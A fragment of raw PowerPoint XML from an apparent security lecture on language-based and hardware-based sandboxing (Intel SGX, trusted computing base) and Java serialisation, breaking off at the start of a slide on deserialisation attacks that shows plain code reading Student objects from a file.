            <a:pPr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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java VM &amp; OS in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TCB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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rgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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rgbClr val="008000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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardware-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supported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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enclaves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsafe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languages</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg Intel SGX enclaves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nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>underlying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>possibly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not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TCB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nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill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rgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill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108548" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{574DF35F-F3D8-2D0B-16B5-A587DBC942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E687B38A-D40A-41D2-A9E6-9A5A1DF6544D}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108549" name="Right Brace 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606DF008-6169-98AF-7B60-A55B8AD59467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="2132013"/>
            <a:ext cx="239713" cy="3656012"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8332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8550" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D1FD39-C844-0309-71EE-FF30E7201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3475038"/>
            <a:ext cx="2019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en-US" sz="2000">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000" i="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000" b="1" i="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108551" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59729827-5C59-DA3E-F1B2-6719AA408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8" y="914400"/>
            <a:ext cx="29194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en-US" sz="2000">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access control </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000" i="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   applications and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000" i="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>between</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108552" name="Right Brace 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008E1C9A-E249-B9A5-A374-0269D5E1F324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292725" y="1165225"/>
            <a:ext cx="215900" cy="458788"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8303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:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D98FF30-86D8-E5A8-49AC-D4E945223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Recap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F525604B-2CD5-4A6A-4A7C-AF5250AC1C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NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Language-based sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL"/>
              <a:t>is a way to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do access control within a application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" i="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different access right for different parts of code</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="180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nl-NL" altLang="nl-NL" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This reduces the TCB for some functionality </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800"/>
              <a:t>This may allows us to limit code review to small part of the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800"/>
              <a:t>This allows us to run code from many sources on the same VM and don’t trust all of them equally                                                                                                                      </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL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nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardware-based sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can also achieve this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>also for unsafe programming languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Much smaller TCB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: OS and VM are no longer in the TCB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>less expressive &amp; less flexible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No stackwalking or rich set of permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109572" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF05C87E-B535-BFF0-D1D8-B074EDAA54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4CACAA31-F673-489B-97DE-04A3CD8147D8}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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C2CAA-3D0F-FDC7-4A62-E7CB065A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42469">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0"/>
              <a:t>(De)serialisation  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="264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DEAB0B-C6AB-56D5-EDFC-754FECF0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239838"/>
            <a:ext cx="8555037" cy="5648325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>marshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>turning a data structure or object into sequence of bytes or string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unmarshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unpickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>turning a sequence of bytes back into a data structure or object </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef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 defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typically uses: storing objects on disk, transferring objects over network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef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 defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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2164" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B0781-9964-B226-EA61-61C9DC95217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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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40957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9097D16C-212F-431B-BE46-E7162F9AF926}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A pink elephant with a baby elephant&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97125416-AB23-9B4F-1F8D-C3729A6DC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0" y="2627709"/>
            <a:ext cx="1587180" cy="106076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2675D93-44A4-3564-A7A5-A3799985B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241044"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3145204" y="3032361"/>
          <a:ext cx="3749040" cy="2514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445199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986762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3379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788668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618655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190954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772369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912114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0762426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904607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120723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962639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4636768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20508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7204355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122832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65104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11962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613616"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A pink elephant with a baby elephant&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4BB3DD-D0D6-765E-9B35-1B1A09AAB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64" y="2627709"/>
            <a:ext cx="1587180" cy="106076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1157609-711F-F560-3F42-1281803A5B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2159992" y="2915775"/>
            <a:ext cx="776443" cy="484632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Comic Sans MS" pitchFamily="64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6A64E12-36A9-5126-BC96-13A19CED1CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7103013" y="2915775"/>
            <a:ext cx="776443" cy="484632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220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C2CAA-3D0F-FDC7-4A62-E7CB065A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42469">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0" err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2646" dirty="0"/>
              <a:t> Java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DEAB0B-C6AB-56D5-EDFC-754FECF0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239838"/>
            <a:ext cx="8555037" cy="5648325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("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/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tmp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/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students.ser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
